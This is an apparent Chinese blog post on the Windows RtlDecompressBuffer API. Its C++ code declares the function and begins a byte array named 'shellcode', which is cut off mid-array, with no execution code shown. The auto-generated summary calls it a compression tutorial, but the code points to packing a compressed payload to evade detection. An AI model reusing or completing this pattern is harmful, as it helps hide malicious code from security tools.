从m0yv学到了一个新的api——RtlDecompressBuffer

最新推荐文章于 2023-10-24 15:08:09 发布

「已注销」

最新推荐文章于 2023-10-24 15:08:09 发布

阅读量428

点赞数

文章标签： c语言 c++ visual studio

本文链接：https://blog.csdn.net/xmd213131/article/details/123327366

版权

本文详细探讨了C/C++中RtlDecompressBuffer API的使用，介绍了如何在Visual Studio环境下进行压缩与解压缩操作。通过实例解析，帮助读者掌握这一实用的API功能。

摘要由CSDN通过智能技术生成

在这里插入图片描述

#include <stdio.h>
#include <vector>
#include <windows.h>
#include <psapi.h>

#pragma comment(lib,"bcrypt.lib")
#pragma warning(disable:4996)

#define NT_SUCCESS(Status)          (((NTSTATUS)(Status)) >= 0)

#define STATUS_SUCCESS                 ((NTSTATUS)0x00000000UL)

struct blob
{
   
	LPBYTE lpBuf;
	SIZE_T dwBufSize;
};

typedef NTSTATUS (WINAPI* fnRtlDecompressBuffer)(
	_In_  USHORT CompressionFormat,
	_Out_ PUCHAR UncompressedBuffer,
	_In_  ULONG  UncompressedBufferSize,
	_In_  PUCHAR CompressedBuffer,
	_In_  ULONG  CompressedBufferSize,
	_Out_ PULONG FinalUncompressedSize
);

unsigned char shellcode[] = {
   
 0xd4, 0xb0, 0x00, 0x11, 0xf2, 0x46, 0xbe, 0x93, 0xba, 0x21, 0x17, 0x00,
 0xbe, 0xa0, 0xc3, 0x81, 0x21, 0xb1, 0x53, 0xee, 0x00, 0x78, 0x38, 0x08,
 0x74, 0x2a, 0x4f, 0xc7, 0xc4, 0x00, 0x9e, 0xc3, 0x43, 0xc8, 0x1e, 0x9d,
 0xd5, 0x16, 0x00, 0xde, 0x41, 0xcf, 0x4a, 0x4b, 0x61, 0x0a, 0x7f, 0x00,
 0x97, 0xce, 0xaf, 0xdc, 0x27, 0xa1, 0x8c, 0x28, 0x00, 0xc8, 0x47, 0x26,
 0x6b, 0x7d, 0x45, 0xd2, 0xb3, 0x00, 0xec, 0x41, 0x71, 0x6f, 0x3f, 0x46,
 0x41, 0x1b, 0x00, 0x14, 0xe5, 0xa9, 0xc0, 0x20, 0x12, 0x53, 0x0d, 0x00,
 0xcf, 0xb1, 0xac, 0x9f, 0xae, 0xba, 0x89, 0xe1, 0x00, 0x54, 0x3d, 0xf5,
 0x46, 0x77, 0xb3, 0x41, 0xa9, 0x00, 0x41, 0x2b, 0x05, 0x4a, 0x6b, 0xa4,
 0x37, 0x6b, 0x00, 0xb4, 0xdf, 0xa9, 0x1f, 0xed, 0x3f, 0x15, 0xc5, 0x00,
 0xa7,